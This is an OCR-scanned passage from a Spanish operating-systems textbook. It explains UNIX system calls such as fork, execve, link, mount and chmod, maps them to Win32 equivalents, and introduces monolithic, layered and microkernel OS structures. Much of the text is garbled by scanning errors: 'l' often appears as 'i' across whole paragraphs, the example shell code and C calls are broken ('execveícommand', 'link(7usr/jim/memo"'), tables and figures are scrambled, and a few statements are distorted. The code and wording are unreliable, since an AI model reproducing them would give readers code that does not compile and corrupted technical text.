pid puede esperar a un hijo específico o a cualquier hijo anterior si establece el primer parámetro a 
-1. Cuando waitpid se completa, la dirección a la que apunta el segundo parámetro (statloc) se es¬ 
tablece al estado de salida del hijo (terminación normal o anormal, con el valor de exit). También 
se proporcionan varias opciones, especificadas por el tercer parámetro. 

Ahora considere la forma en que el shell utiliza a fonk. Cuando se escribe un comando, el shell 
crea un nuevo proceso usando fork. Este proceso hijo debe ejecutar el comando de usuario. Para 
ello utiliza la llamada al sistema execve, la cual hace que toda su imagen de núcleo completa se sus¬ 
tituya por el archivo nombrado en su primer parámetro. (En realidad, la llamada al sistema en sí es 
exec, pero varios procedimientos de biblioteca lo llaman con distintos parámetros y nombres lige¬ 
ramente diferentes. Aquí trataremos a estas llamadas como si fueran llamadas al sistema.) En la fi¬ 
gura 1-19 se muestra un shell muy simplificado que ilustra el uso de fork, waitpid y execve. 

#defineTRUE 1 


while (TRUE) { 

type_prompt{); 

read_command{command, parameters); 

if (forkO !=0) { 

/* Codigo del padre. */ 
waitpid{-l, SiStatus, 0); 

}else { 

/* Codigo del hijo. */ 
execveícommand, parameters, 0); 

} 

} 


/* se repite en forma indefinida *1 

I* muestra el indicador de comando en la pantalla *1 

I* lee la entrada de la terminal *1 

I* usa fork para el proceso hijo *1 

I* espera a que el hijo termine *1 

I* ejecuta el comando *1 


Figura 1-19. U na versión simplificada del shell. En este libro supondremos queTRU E 
se define como 1. 


En el caso más general, execve tiene tres parámetros: el nombre del archivo que se va a ejecu¬ 
tar, un apuntador al arreglo de argumentos y un apuntador al arreglo del entorno. En breve descri¬ 
biremos estos parámetros. Se proporcionan varias rutinas de biblioteca incluyendo a execi, execv. 
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execle y execve, para permitir ia omisión de ios parámetros o para especificados de varias formas. 
En este iibro utiiizaremos ei nombre exec para representar ia iiamada ai sistema que se invoca me¬ 
diante cada una de estas rutinas. 

Consideremos ei caso de un comando tai como 

cp archivol archivo2 

que se utiiiza para copiar archivol a archivo2. Una vez queei sheii se ha bifurcado mediante fork, 
ei proceso hijo iocaiiza y ejecuta ei archivo cp y ie pasa ios nombres de ios archivos de origen y 
destino. 

Ei programa principai de cp (y ei programa principai de i a mayoría de ios otros programas en 
C) contienen ia siguiente deciaración: 

mainfargc, argv, envp) 

en donde argc es una cuenta dei número de eiementos en ia iínea de comandos, inciuyendo ei nom¬ 
bre dei programa. Para ei ejempio anterior, argc es 3. 

Ei segundo parámetro, argv, es un apuntador a un arregio. Ei eiemento i de ese arregio es un 
apuntador a ia i-ésima cadena en ia iínea de comandos. En nuestro ejempio, argv[0] apuntaría a ia 
cadena "cp", argv[l] apuntaría a ia cadena "archivol" y argv[2] apuntaría a ia cadena "archivo2". 

Ei tercer parámetro de main, envp, es un apuntador ai entorno, un arregio de cadenas que con¬ 
tiene asignaciones de ia forma nombre = vaior que se utiiizan para pasar información, tai como ei 
tipo de terminai y ei nombre dei directorio de inicio, a ios programas. Hay procedimientos de bi- 
biioteca que ios programas pueden iiamar para obtener ias vari abies de entorno, que a menudo se 
utiiizan para personaiizar ia forma en que un usuario desea reaiizar ciertas tareas (por ejempio, ia 
impresora predeterminada que desea utiiizar). En ia figura 1-19 no se pasa un entorno ai hijo, por 
i o que ei tercer parámetro de execve es un cero. 

Si exec parece compiicado, no se desanime: es (en sentido semántico) ia más compieja de to¬ 
das iasiiamadasai sistema POSIX. Todas ias demás son mucho más simpies. Como ejempio de una 
iiamada simpie considere a exit, que ios procesos deben utiiizar cuando terminan su ejecución. Tie¬ 
ne un parámetro, ei estado de exit (0 a 255), que se devueive ai padre mediante statioc en ia iia¬ 
mada ai sistema waitpid. 

En UNIX los procesos tienen su memoria dividida en tres segmentos: el segmento de texto (es 
decir, el código del programa), el segmento de datos (es decir, las variables) y el segmento depila. 
El segmento de datos crece hacia arriba y la pila crece hacia abajo, como se muestra en la figura 
1-20. Entre ellos hay un espacio libre de direcciones sin utilizar. La pila crece hacia ese espacio de 
manera automática, según sea necesario, pero la expansión del segmento de datos se realiza de ma¬ 
nera explícita mediante una llamada al sistema (brk), la cual especifica la nueva dirección en donde 
debe terminar el segmento de datos. Sin embargo, esta llamada no está definida en el estándar dePO- 
SIX, ya que se recomienda a los programadores utilizar el procedimiento de biblioteca malloc para 
asignar espacio de almacenamiento en forma dinámica y la implementación subyacente de malloc no 
se consideró como un tema adecuado para su estandarización, ya que pocos programadores lo utili¬ 
zan directamente y es improbable que alguien se dé cuenta siquiera que brk no está en POSIX. 
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Dirección (hex) 



Figura 1-20. Los procesos tienen tres segmentos: de texto, de datos y de pila. 


1.6.2 Llamadas al sistema para la 
administración de archivos 

M uchas llamadas al sistema se relacionan con el sistema de archivos. En esta sección analizaremos 
las llamadas que operan con archivos individuales: en la siguiente sección examinaremos las llama¬ 
das que implican el uso de directorios o el sistema de archivos como un todo. 

Para leer o escribir en un archivo, éste debe primero abrirse mediante open. Esta llamada es¬ 
pecifica el nombre del archivo que se va a abrir, ya sea como un nombre de ruta absoluto o relati¬ 
vo al directorio de trabajo, y un código de 0_RD0NLY, 0_WR0NLY o 0_RDWR, que significa 
abrir para lectura, escritura o ambos. Para crear un nuevo archivo se utiliza el parámetro 0_CREAT. 
Después se puede utilizar el descriptor de archivo devuelto para leer o escribir. Al terminar, el ar¬ 
chivo se puede cerrar mediante cióse, que hace que el descriptor de archivo esté disponible para 
reutilizarlo en una llamada a open posterior. 

Las llamadas de uso más frecuente son sin duda read y write. Anteriormente vimos a read. 
write tiene los mismos parámetros. 

Aunque la mayoría de los programas leen y escriben archivos en forma secuencial, para cier¬ 
tas aplicaciones los programas necesitan la capacidad de acceder a cualquier parte del archivo en 
forma aleatoria. Con cada archivo hay un apuntador asociado, el cual indica la posición actual 
en el archivo. Al leer (escribir) en forma secuencial, por lo general apunta al siguiente byte que se 
va a leer (escribir). La llamada a iseek cambia el valor del apuntador de posición, de manera que 
las siguientes llamadas a read o write puedan empezar en cualquier parte del archivo. 

Lseek ti ene tres parámetros: el primero es el descriptor del archivo, el segundo es una posición 
en el archivo y el tercero indica si la posición en el archivo es relativa al inicio del mismo, a la po¬ 
sición actual o al final del archivo. El valor devuelto por iseek es la posición absoluta en el archi¬ 
vo (en bytes) después de modificar el apuntador. 

Para cada archivo, UNIX lleva el registro del modo del archivo (archivo regular, especial, direc¬ 
torio, etcétera), su tamaño, la hora de la última modificación y demás información. Para ver esta in¬ 
formación, los programas pueden utilizar la llamada al sistema stat. El primer parámetro especifica 
el archivo que se va a inspeccionar; el segundo es un apuntador a una estructura en donde se va a co¬ 
locar la información. Las llamadas al sistema fstat hacen lo mismo para un archivo abierto. 
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1.6.3 Llamadas al sistema para la administración de directorios 

En esta sección analizaremos algunas llamadas al sistema que se relacionan más con los directorios o 
con el sistema de archivos como un todo, en vez de relacionarse sólo con un archivo específico, co¬ 
mo en la sección anterior. Las primeras dos llamadas, mkdir y rmuin, crean y eliminan directorios va¬ 
cíos, respectivamente. La siguiente llamada es link. Su propósito es permitir que aparezca el mismo 
archivo bajo dos o más nombres, a menudo en distintos directorios. Un uso común es para permitir 
que varios miembros del mismo equipo de programación compartan un archivo común, en donde ca¬ 
da uno de ellos puede ver el archivo en su propio directorio, posiblemente bajo distintos nombres. No 
es lo mismo compartir un archivo que proporcionar a cada miembro del equipo una copia privada: te¬ 
ner un archivo compartido significa que los cambios que realice cualquier miembro del equipo serán 
visibles de manera instantánea para los otros miembros: sólo hay un archivo. Cuando se realizan co¬ 
pias de un archivo, los cambios subsiguientes que se realizan en una copia no afectan a las demás. 

Para ver cómo funciona link, considere la situación de la figura l-21(a). Aquí hay dos usua¬ 
rios, ast y jim, y cada uno tiene su propio directorio con algunos archivos. Si ast ejecuta ahora un 
programa que contenga la llamada al sistema 

link(7usr/jim/memo", 7usr/ast/nota"); 

el archivo memo en el directorio de jim se introduce en el directorio de ast bajo el nombre nota. De 
aquí en adelante, /usr/jim/memo y /usr/ast/nota harán referencia al mismo archivo. Para comple¬ 
mentar, hay que tener en cuenta que el lugar en el que se mantengan los directorios de los usuarios, 
ya sea en /usr, /user, /home o en alguna otra parte es simplemente una decisión que realiza el admi¬ 
nistrador del sistema local. 


/usr/ast /usr/jim /usr/ast /usr/jim 


16 

correo 


31 

bin 


16 

correo 


31 

bin 

81 

juegos 


70 

memo 


81 

juegos 


70 

memo 

40 

prueba 


59 

f.c. 


40 

prueba 


59 

f.c. 




38 

progl 


70 

nota 


38 

progl 


(a) (b) 

Figura 1-21. a) Dos directorios antes de enlazar /usr/jim/memo al directorio de ast. 
b) Los mismos directorios después del enlace. 

Entendiendo cómo funciona link probablemente nos aclare lo que hace. Todo archivo en UNIX 
tiene un número único, su número-i, que lo identifica. Este número-i es un índice en una tabla de no- 
dos-i, uno por archivo, que indican quién es propietario del archivo, en dónde están sus bloques de 
disco, etcétera. Un directorio es simplemente un archivo que contiene un conjunto de pares (núme¬ 
ro-i, nombreASCII). En las primeras versiones de UNIX, cada entrada de directorio era de 16 bytes: 
2 bytes para el número-i y 14 bytes para el nombre. A hora se necesita una estructura más complica¬ 
da para soportar los nombres de archivo extensos, pero en concepto un directorio sigue siendo un 
conjunto de pares (número-i, nombreASCII). En la figura 1-21, correo tiene el número-i 16, y así 
sucesivamente. Lo que iink hace es tan sólo crear una nueva entrada de directorio con un nombre 
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(posiblemente nuevo), usando el número-i de un archivo existente. En la figura l-21(b), dos entra¬ 
das tienen el mismo número-i (70) y por ende se refieren al mismo archivo. Si más adelante se eli¬ 
mina una de las dos mediante la llamada al sistema uniink, la otra sigue vigente. Si se eliminan 
ambas, UNIX ve que no existen entradas para el archivo (un campo en el nodo-i lleva la cuenta del 
número de entradas de directorio que apuntan al archivo), por lo que el archivo se elimina del disco. 

Como dijimos antes, la llamada al sistema mount permite combinar dos sistemas de archivos en 
uno. U na situación común es hacer que el sistema de archivos raíz contenga las versiones binarias (eje¬ 
cutables) de los comandos comunes y otros archivos de uso frecuente, en un disco duro. Así, el usua¬ 
rio puede insertar un disco de CD-ROM con los archivos que se van a leer en la unidad de CD-ROM . 

Al ejecutar la llamada al sistema mount, el sistema de archivos de CD-ROM se puede adjuntar 
al sistema de archivos raíz, como se muestra en la figura 1-22. Una instrucción común en C para 
realizar el montaje es 

mount(7dev/fd0”, "/mnt”, 0); 

donde el primer parámetro es el nombre de un archivo especial de bloque para la unidad 0, el se¬ 
gundo parámetro es la posición en el árbol en donde se va a montar y el tercer parámetro indica que 
el sistema de archivo se va a montar en modo de lectura-escritura o de sólo escritura. 



Figura 1-22. (a) Sistema de archivos antes del montaje, (b) Sistema de archivos des¬ 
pués del montaje. 

Después de la llamada a mount, se puede tener acceso a un archivo en la unidad 0 con sólo uti¬ 
lizar su ruta del directorio raíz o del directorio de trabajo, sin importaren cuál unidad se encuentre. 
De hecho, las unidades segunda, tercera y cuarta también se pueden montar en cualquier parte del 
árbol. La llamada a mount hace posible integrar los medios removibles en una sola jerarquía de ar¬ 
chivos integrada, sin importar en qué dispositivo se encuentra un archivo. Aunque este ejemplo in¬ 
volucra el uso de CD-ROMs, también se pueden montar porciones de los discos duros (que a 
menudo se les conoce como particiones o dispositivos menores) de esta forma, así como los dis¬ 
cos duros y memorias USB externos. Cuando ya no se necesita un sistema de archivos, se puede 
desmontar mediante la llamada al sistema umount. 


1.6.4 M iscelánea de llamadas al sistema 

También existe una variedad de otras llamadas al sistema. Sólo analizaremos cuatro de ellas aquí. 
La llamada a chdir cambia el directorio de trabajo actual. Después de la llamada 

chdir(7usr/ast/prueba"); 
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una instrucción para abrir ei archivo xyz abrirá /usr/ast/prueba/xyz. Ei concepto de un directorio de 
trabajo eiimina ia necesidad de escribir nombres de ruta absoiutos (extensos) todo ei tiempo. 

En UNIX, cada archivo tiene un modo que se utiiiza por protección. Ei modo inciuye ios bits 
ieer-escribir-ejecutar para ei propietario, grupo y ios demás. Laiiamada ai sistema chmod hacepo- 
sibie modificar ei modo de un archivo. Por ejempio, para que un archivo sea de sóio iectura para 
todos excepto ei propietario, podríamos ejecutar 

chmod("archivo", 0644); 

La iiamada ai sistema kill es ia forma en que ios usuarios y ios procesos de usuario envían seña- 
ies. Si un proceso está preparado para atrapar una señai específica, y iuego ésta iiega, se ejecuta un 
manejadordeseñaies. Si ei proceso no está preparado para manejar una señai, entonces su iiegada ma¬ 
ta ei proceso (de aquí que se utiiice ese nombre para (a iiamada). 

POSIX define varios procedimientos para tratar con ei tiempo. Por ejempio, time sóiodevuei- 
ve ia hora actuai en segundos, en donde 0 corresponde a Enero 1,1970 a medianoche (justo cuan¬ 
do ei día empezaba y no terminaba). En ias computadoras que utiiizan paiabras de 32 bits, ei vaior 
máximo que puede devoiver time es de 2^^ - 1 segundos (suponiendo que se utiiiza un entero sin 
signo). Este vaior corresponde a un poco más de 136 años. Así, en ei año 2106 ios sistemas UNIX 
de 32 bits se voiverán iocos, aigo parecido ai famoso probiema dei año 2000 (Y 2K) que hubiera 
causado estragos con ias computadoras dei mundo en ei 2000, si no fuera por ei masivo esfuerzo 
que puso ia industria de IT para corregir el problema. Si actualmente usted tiene un sistema UNIX 
de 32 bits, se le recomienda que lo intercambie por uno de 64 bits antes del año 2106. 


1.6.5 L a API Win32 de Windows 

Hasta ahora nos hemos enfocado principalmente en UNIX. Es tiempo de dar un vistazo breve a 
Windows. Windows y UNIX difieren de una manera fundamental en sus respectivos modelos de 
programación. Un programa de UNIX consiste en código que realiza una cosa u otra, haciendo lla¬ 
madas al sistema para realizar ciertos servicios. En contraste, un programa de Windows es por lo 
general manejado por eventos. El programa principal espera a que ocurra cierto evento y después 
llama a un procedimiento para manejarlo. Los eventos comunes son las teclas que se oprimen, el 
ratón que se desplaza, un botón de ratón que se oprime o un CD-ROM que se inserta. Después, los 
manejadores se llaman para procesar el evento, actualizar la pantalla y actualizar el estado interno 
del programa. En todo, esto produce un estilo algo distinto de programación que con UNIX, pero 
debido a que el enfoque de este libro es acerca de la función y la estructura del sistema operativo, 
estos distintos modelos de programación no nos preocuparán por mucho. 

Desde luego que Windows también tiene llamadas al sistema. Con UNIX, hay casi una rela¬ 
ción de uno a uno entre las llamadas al sistema (por ejemplo, reau) y los procedimientos de biblio¬ 
teca (por ejemplo, read) que se utilizan para invocar las llamadas al sistema. Enotras palabras, para 
cada llamada al sistema, es raro que haya un procedimiento de biblioteca que sea llamado para in¬ 
vocarlo, como se indica en la figura 1-17. Lo que es más, POSIX tiene aproximadamente 100 lla¬ 
madas a procedimientos. 
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Con Windows, la situación es bastante distinta. Para empezar, las llamadas a la biblioteca y 
las llamadas al sistema están muy desacopladas. Microsoft ha definido un conjunto de procedi¬ 
mientos conocidos como API Win32 (Application Program Interface, Interfaz de programación 
de aplicaciones) que los programadores deben utilizar para obtener los servicios del sistema ope¬ 
rativo. Esta interfaz se proporciona (parcialmente) en todas las versiones de Windows, desde Win¬ 
dows 95. Al desacoplar la interfaz de las llamadas actuales al sistema, Microsoft retiene la 
habilidad de modificar las llamadas al sistema en el tiempo (incluso de versión en versión) sin 
invalidar los programas existentes. Lo que constituye realmente a Win32 es también ligeramente 
ambiguo, debido a que Windows 2000, Windows X P y Windows Vista tienen muchas nuevas lla¬ 
madas que antes no estaban disponibles. En esta sección Win32 significa la interfaz que soportan 
todas las versiones de Windows. 

El número de llamadas a la API Win32 es muy grande, alrededor de los miles. Lo que es más, 
aunque muchas de ellas invocan llamadas al sistema, un número considerable de las mismas se lle¬ 
va a cabo completamente en espacio de usuario. Como consecuencia, con Windows es imposible 
ver lo que es una llamada al sistema (el kernel se encarga de ello) y qué es simplemente una llama¬ 
da a la biblioteca en espacio de usuario. De hecho, lo que es una llamada al sistema en una versión 
de Windows se puede realizar en espacio de usuario en una versión diferente y viceversa. Cuando 
hablemos sobre las llamadas al sistema Windows en este libro, utilizaremos los procedimientos de 
Win32 (en donde sea apropiado), ya que M icrosoft garantiza que éstos serán estables a través del 
tiempo. Pero vale la pena recordar que no todos ellos son verdaderas llamadas al sistema (es decir, 
trapsal kernel). 

LaA Pl Win32 tiene un gran número de llamadas para administrar ventanas, figuras geométri¬ 
cas, texto, tipos de letras, barras de desplazamiento, cuadros de diálogo, menús y otras caracterís¬ 
ticas de la G UI. H asta el grado de en que el subsistema de gráficos se ejecute en el kernel (lo cual 
es cierto en algunas versiones de Windows, pero no en todas), éstas son llamadas al sistema: en 
caso contrario, sólo son llamadas a la biblioteca. ¿Debemos hablar sobre estas llamadas en este li¬ 
bro o no? Como en realidad no se relacionan con la función de un sistema operativo, hemos deci¬ 
dido que no, aun cuando el kernel puede llevarlas a cabo. Los lectores interesados en la API Win32 
pueden consultar uno de los muchos libros acerca del tema (por ejemplo, Hart, 1997; Rector y 
Newcomer, 1997; y Simón, 1997). 

Incluso está fuera de cuestión introducir todas las llamadas a laAPI Win32 aquí, por lo que nos 
restringiremos a las llamadas que apenas si corresponden a la funcionalidad de las llamadas de Unix 
que se listan en la figura 1-18. Éstas se listan en la figura 1-23. 

Ahora daremos un breve repaso a la lista de la figura 1-23. createProcess crea un proceso. 
Realiza el trabajo combinado de fork y execve en U NIX. Tiene muchos parámetros que especifi¬ 
can las propiedades del proceso recién creado. Windows no tiene una jerarquía de procesos como 
U NIX, por lo que no hay un concepto de un proceso padre y un proceso hijo. U na vez que se crea 
un proceso, el creador y el creado son iguales. waitForSingieObject se utiliza para esperar un even¬ 
to. Se pueden esperar muchos eventos posibles. Si el parámetro especifica un proceso, entonces 
el proceso llamador espera a que el proceso especificado termine, lo cual se hace mediante Exit- 
Process. 

Las siguientes seis llamadas operan con archivo y tienen una funcionalidad similar a sus con¬ 
trapartes de UNIX, aunque difieren en cuanto a los parámetros y los detalles. Aún así, los archivos 
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UNIX 

Win32 

Descripción 

fork 

CreateProcess 

Crea un nuevo proceso 

waitpid 

WaitForSingleObject 

Puede esperar a que un proceso termine 

execve 

(ninguno) 

CreateP roces =fork -i-execve 

exit 

ExitProcess 

Termina la ejecución 

open 

CreateFile 

Crea un archivo o abre uno existente 

cióse 

CloseHandIe 

Cierra un archivo 

read 

ReadFile 

Lee datos de un archivo 

write 

Write File 

Escribe datos en un archivo 

Iseek 

SetFilePointer 

Desplaza el apuntador del archivo 

stat 

GetFileAttributesEx 

Obtiene varios atributos de un archivo 

mkdir 

CreateDirectory 

Crea un nuevo directorio 

rmdir 

RemoveDirectory 

Elimina un directorio vacío 

link 

(ninguno) 

Win32 no soporta los enlaces 

unlink 

DeleteFile 

Destruye un archivo existente 

mount 

(ninguno) 

Win32 no soporta el montaje 

umount 

(ninguno) 

Win32 no soporta el montaje 

chdir 

SetCurrentDirectory 

Cambia el directorio de trabajo actual 

chmod 

(ninguno) 

Win32 no soporta la seguridad (aunque NT sí) 

kill 

(ninguno) 

Win32 no soporta las señales 

time 

GetLocalTime 

Obtiene la hora actual 


Figura 1-23. Las llamadas a laAPI Win32 que apenas corresponden a las llamadas de 
UNIX de la figura 1-18. 

se pueden abrir, cerrar, leer y escribir en ellos en forma muy parecida a UNIX. Las llamadas set- 
FiiePointer y GetFiieAttnibutesEx establecen la posición de un archivo y obtienen algunos de sus 
atributos. 

Windows tiene directorios, que se crean y eliminan con las llamadasa laAPI createoirectory 
y RemoveDirectory, respectivamente. También hay una noción de un directorio actual, el cual se es¬ 
tablece mediante setcurrentoinectory. La hora actual del día se adquiere mediante el uso de oe- 
tLocalTime. 

La interfaz de Win32 no tiene enlaces a archivos, sistemas de archivos montados, seguridad ni 
señales, por lo que las llamadas correspondientes a las de UN IX no existen. Desde luego queWin32 
tiene un gran número de otras llamadas que UN IX no tiene, en especial para administrar la GUI. Y 
Windows Vista tiene un elaborado sistema de seguridad, además de que también soporta los enla¬ 
ces de archivos. 

Tal vez vale la pena hacer una última observación acerca de Win32: no es una interfaz tan uni¬ 
forme o consistente. La principal culpabilidad de esto fue la necesidad detener compatibilidad ha¬ 
cia atrás con la interfaz de 16 bits anterior utilizada en Windows 3.x. 
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1.7 ESTRUCTURA DE UN SISTEMA OPERATIVO 

A hora que hemos visto la apariencia exterior délos sistemas operativos (es decir, la interfaz del pro¬ 
gramador), es tiempo de dar un vistazo a su interior. En las siguientes secciones analizaremos seis 
estructuras distintas que se han probado, para poder darnos una idea del espectro de posibilidades. 
De ninguna manera quiere esto decir que sean exhaustivas, pero nos dan una idea de algunos dise¬ 
ños que se han probado en la práctica. Los seis diseños son: sistemas monolíticos, sistemas de ca¬ 
pas, microkerneis, sistemas cliente-servidor, máquinas virtuales y exokernels. 

1.7.1 Sistemas monolíticos 

En este diseño, que hasta ahora se considera como la organización más común, todo el sistema ope¬ 
rativo se ejecuta como un solo programa en modo kernel. El sistema operativo se escribe como una 
colección de procedimientos, enlazados entre sí en un solo programa binario ejecutable extenso. 
Cuando se utiliza esta técnica, cada procedimiento en el sistema tiene la libertad de llamar a cual¬ 
quier otro, si éste proporciona cierto cómputo útil que el primero necesita. Al tener miles de proce¬ 
dimientos que se pueden llamar entre sí sin restricción, con frecuencia se produce un sistema poco 
manejable y difícil de comprender. 

Para construir el programa objeto actual del sistema operativo cuando se utiliza estediseño, pri¬ 
mero se compilan todos los procedimientos individuales (o los archivos que contienen los procedi¬ 
mientos) y luego se vinculan en conjunto para formar un solo archivo ejecutable, usando el 
enlazador del sistema. En términos de ocultamiento de información, en esencia no hay nada: todos 
los procedimientos son visibles para cualquier otro procedimiento (en contraste a una estructura que 
contenga módulos o paquetes, en donde la mayor parte de la información se oculta dentro de mó¬ 
dulos y sólo los puntos de entrada designados de manera oficial se pueden llamar desde el exterior 
del módulo). 

Sin embargo, hasta en los sistemas monolíticos es posible tener cierta estructura. Para solicitar 
los servicios (llamadas al sistema) que proporciona el sistema operativo, los parámetros se colocan 
en un lugar bien definido (por ejemplo, en la pila) y luego se ejecuta una instrucción detrap. Esta 
instrucción cambia la máquina del modo usuario al modo kernel y transfiere el control al sistema 
operativo, lo cual se muestra como el paso 6 en la figura 1-17. Después el sistema operativo obtie¬ 
ne los parámetros y determina cuál es la llamada al sistema que se va a llevar a cabo. Después la 
indiza en una tabla que contiene en la ranura k un apuntador al procedimiento que lleva a cabo 
la llamada al sistema k (paso 7 en la figura 1-17). 

Esta organización sugiere una estructura básica para el sistema operativo: 

1. Un programa principal que invoca el procedimiento de servicio solicitado. 

2. Un conjunto de procedimientos de servicio que llevan a cabo las llamadas al sistema. 

3. Un conjunto de procedimientos utilitarios que ayudan a los procedimientos de servicio. 

En este modelo, para cada llamada al sistema hay un procedimiento de servicio que se encarga de 
la llamada y la ejecuta. Los procedimientos utilitarios hacen cosas que necesitan varios procedí- 
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mientos de servicio, como obtener datos de ios programas de usuario. Esta división de ios proce¬ 
dimientos en tres niveies se muestra en ia figura 1-24. 



Además dei núcieodei sistema operativo que se carga ai arrancar ia computadora, muchos sis¬ 
temas operativos soportan extensiones que se pueden cargar, como ios drivers de dispositivos de 
E/S y sistemas de archivos. Estos componentes se cargan por demanda. 

1.7.2 Sistemas de capas 

Una generaiización dei diseño de ia figura 1-24 es organizar ei sistema operativo como una jerar¬ 
quía de capas, cada una construida encima de ia que tiene abajo. Ei primer sistema construido de 
esta forma fueei sistema THE, construido en Technische Hogeschooi Eindhoven en Hoianda por E. 
W. Dijkstra (1968) y sus estudiantes. Ei sistema THE era un sistema simpie de procesamiento por 
iotes para una computadora hoiandesa, ia Eiectroiogica X8, que tenía 32K de paiabras de 27 bits 
(ios bits eran costosos en aquei entonces). 

Ei sistema tenía seis capas, como se muestra en ia figura 1-25. Ei nivei 0 se encargaba de ia 
asignación dei procesador, de cambiar entre un proceso y otro cuando ocurrían interrupciones o ex¬ 
piraban ios temporizadores. Por encima dei nivei 0, ei sistema consistía en procesos secuenciaies, 
cada uno de ios cuaies e podía programar sin necesidad de preocuparse por ei hecho de que había 
varios procesos en ejecución en un soio procesador. En otras paiabras, ei nivei 0 proporcionaba ia 
muitiprogramación básica de ia CPU. 

La capa 1 se encargaba de ia administración de ia memoria. Asignaba espacio para ios proce¬ 
sos en ia memoria principai y en un tambor de paiabras de 512 K queseutiiizaba para contener par¬ 
tes de procesos (páginas), para ios que no había espacio en ia memoria principai. Por encima de ia 
capa 1, ios procesos no tenían que preocuparse acerca de si estaban en memoria o en ei tambor; ei 
software de ia capa 1 se encargaba de asegurar que ias páginas se iievaran a memoria cuando se re¬ 
querían. 
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Capa 

Función 

5 

El operador 

4 

Programas de usuario 

3 

Administración de la entrada/salida 

2 

Comunicación operador-proceso 

1 

Administración de memoria y tambor 

0 

Asignación del procesador y multiprogramación 


Figura 1-25. Estructura del sistema operativo THE. 


La capa 2 se encargaba de la comunicación entre cada proceso y ia consoia dei operador (es de¬ 
cir, ei usuario). Encima de esta capa, cada proceso tenía en efecto su propia consoia de operador. 
La capa 3 se encargaba de administrar ios dispositivos de E/S y de guardar en búferes ios fiujos de 
información dirigidos para y desde eiios. Encima de ia capa 3, cada proceso podía trabajar con ios 
dispositivos abstractos de E/S con exceientes propiedades, en vez de ios dispositivos reaies con mu¬ 
chas pecuiiaridades. La capa 4 era en donde se encontraban ios programas de usuario. No tenían 
que preocuparse por ia administración de ios procesos, ia memoria, ia consoia o ia E/S. Ei proceso 
operador dei sistema se encontraba en ei nivei 5. 

Una mayor generaiización dei concepto decapas estaba presente en ei sistema M ULTICS. En 
vez de capa, M ULTICS se describió como una serie de aniiios concéntricos, en donde ios interio¬ 
res tenían más priviiegios que ios exteriores (que en efecto viene siendo io mismo). Cuando un pro¬ 
cedimiento en un aniiio exterior quería iiamar a un procedimiento en un aniiio interior, tenía que 
hacer ei equivaiente de una iiamada ai sistema: es decir, una instrucción trap cuyos parámetros 
se comprobara cuidadosamente que fueran váiidos antes de permitir que continuara ia iiamada. 
Aunque todo ei sistema operativo era parte dei espacio de direcciones de cada proceso de usuario 
en M ULTICS, el hardware hizo posible que se designaran procedimientos individuales (en realidad, 
segmentos de memoria) como protegidos contra lectura, escritura o ejecución. 

M ientras que en realidad el esquema de capas deTHE era sólo una ayuda de diseño, debido a 
que todas las partes del sistema estaban enlazadas entre sí en un solo programa ejecutable, en M UL¬ 
TICS el mecanismo de los anillos estaba muy presente en tiempo de ejecución y el hardware se en¬ 
cargaba de implementarlo. La ventaja del mecanismo de los anillos es que se puede extender 
fácilmente para estructurar los subsistemas de usuario. Por ejemplo, un profesor podría escribir un 
programa para evaluar y calificar los programas de los estudiantes, ejecutando este programa en el 
anillo n, mientras que los programas de los estudiantes se ejecutaban en el anillo n -i- 1 y por ende 
no podían cambiar sus calificaciones. 

1.7.3 Microkerneis 

Con el diseño decapas, los diseñadores podían elegir en dónde dibujar el límite entre kernel y usua¬ 
rio. Tradicional mente todos las capas iban al kernel, pero eso no es necesario. De hecho, puede te¬ 
ner mucho sentido poner lo menos que sea posible en modo kernel, debido a que los errores en el 
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kernel pueden paralizar el sistema de inmediato. En contraste, los procesos de usuario se pueden 
configurar para que tengan menos poder, por lo que un error en ellos tal vez no sería fatal. 

Varios investigadores han estudiado el número de errores por cada 1000 líneas de código (por 
ejemplo, Basilli y Perricone, 1984; y Ostrand y Weyuker, 2002). La densidad délos errores depen¬ 
de del tamaño del módulo, su tiempo de vida y más, pero una cifra aproximada para los sistemas 
industriales formales es de diez errores por cada mil líneas de código. Esto significa que es proba¬ 
ble que un sistema operativo monolítico de cinco millones de líneas de código contenga cerca de 
50,000 errores en el kernel. Desde luego que no todos estos son fatales, ya que algunos errores 
pueden ser cosas tales como emitir un mensaje de error incorrecto en una situación que ocurre ra¬ 
ras veces. Sin embargo, los sistemas operativos tienen tantos errores que los fabricantes de compu¬ 
tadoras colocan botones de reinicio en ellas (a menudo en el panel frontal), algo que los fabricantes 
de televisiones, estéreos y autos no hacen, a pesar de la gran cantidad de software en estos dispo¬ 
sitivos. 

La idea básica detrás del diseño de microkernel es lograr una alta confiabilidad al dividir el sis¬ 
tema operativo en módulos pequeños y bien definidos, sólo uno de los cuales (el microkernel) se 
ejecuta en modo kernel y el resto se ejecuta como procesos de usuario ordinarios, sin poder relati¬ 
vamente. En especial, al ejecutar cada driver de dispositivo y sistema de archivos como un proce¬ 
so de usuario separado, un error en alguno de estos procesos puede hacer que falle ese componente, 
pero no puede hacer que falle todo el sistema. Así, un error en el driver del dispositivo deaudio ha¬ 
rá que el sonido sea confuso o se detenga, pero la computadora no fallará. En contraste, en un 
sistema monolítico con todos los drivers en el kernel, un driver de audio con errores puede hacer 
fácilmente referencia a una dirección de memoria inválida y llevar a todo el sistema a un alto ro¬ 
tundo en un instante. 

Se han implementado y desplegado muchos microkerneis (Accetta y colaboradores, 1986; Haer- 
tig y colaboradores, 1997; Heiser y colaboradores, 2006; Herder y colaboradores, 2006; Hildebrand, 
1992; Kirsch y colaboradores, 2005; Liedtke, 1993, 1995, 1996; Pike y colaboradores, 1992; y 
Zuberi y colaboradores, 1999). Son en especial comunes en las aplicaciones en tiempo real, indus¬ 
triales, aeronáuticas y militares que son de misión crítica y tienen requerimientos de confiabilidad 
muy altos. Algunos de los microkerneis mejor conocidos son Integrity, K42, L4, PikeOS, QNX, 
Symbian y MINIX 3. Ahora veremos en forma breve las generalidades acerca de M INIX 3, que ha 
llevado la idea de la modularidad hasta el límite, dividiendo la mayor parte del sistema operativo en 
varios procesos independientes en modo usuario. M INIX 3 es un sistema de código fuente abierto 
en conformidad con POSIX, disponible sin costo en www.minix3.org (Herder y colaboradores, 
2006a; Herder y colaboradores, 2006b). 

El microkernel M INIX 3 sólo tiene cerca de 3200 líneas deC y 800 líneas de ensamblador pa¬ 
ra las funciones de muy bajo nivel, como las que se usan para atrapar interrupciones y conmutar 
proceso. El código de C administra y planifica los procesos, se encarga de la comunicación en¬ 
tre procesos (al pasar mensajes entre procesos) y ofrece un conjunto de aproximadamente 35 lla¬ 
